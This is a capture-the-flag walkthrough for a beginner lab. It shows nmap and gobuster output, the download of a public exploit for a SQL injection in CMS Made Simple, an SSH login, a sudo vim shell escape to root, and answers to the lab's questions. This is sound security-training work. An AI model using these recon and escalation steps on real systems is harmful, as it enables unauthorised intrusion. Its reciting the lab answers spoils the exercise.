┌──(root💀kali)-[~]
└─# nmap -T5 -sC -sV -O -Pn -p- 10.10.61.2
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-08 09:12 EDT
Nmap scan report for 10.10.61.2
Host is up (0.22s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.13.22.56
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/ /openemr-5_0_1_3
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
| 256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
|_ 256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (90%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Adtran 424RG FTTH gateway (86%), Linux 2.6.32 (86%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 333.81 seconds
Gobuster
┌──(root💀kali)-[~]
└─# gobuster dir -u http://10.10.61.2/ --wildcard -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.61.2/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/05/08 09:30:20 Starting gobuster in directory enumeration mode
===============================================================
/simple (Status: 301) [Size: 309] [--> http://10.10.61.2/simple/]
We find a page using CMS made simple that has a cve. We can try this exploit
We take it in our kali wget https://www.exploit-db.com/download/46635
But we can also try to check if the creds would work with ssh (Remember to specify the port in your ssh command because it is not on default 22 port)
ssh mitch@10.10.104.30 -p 2222
Privesc
sudo -l we find out that vim is allowed
We can do this trick heresudo vim -c ':!/bin/bash' I just changed it to get a bash shell
Questions
How many services are running under port 1000? Answer 2
What is running on the higher port? Answer ssh
What's the CVE you're using against the application? Answer CVE-2019-9053 reading the exploit we understand that the app is vulnerable to a time based SQL injection.
To what kind of vulnerability is the application vulnerable? Answer SQLi
What's the password? I will let you find this on your own
Where can you login with the details obtained? Answer ssh
What's the user flag? I will let you find this on your own. Hint: cat user.txt
Is there any other user in the home directory? What's its name? We do an ls /home and we find the user sunbath
What can you leverage to spawn a privileged shell? Answer vim
What's the root flag? I will let you find this on your own. Hint: cat /root/root.txt
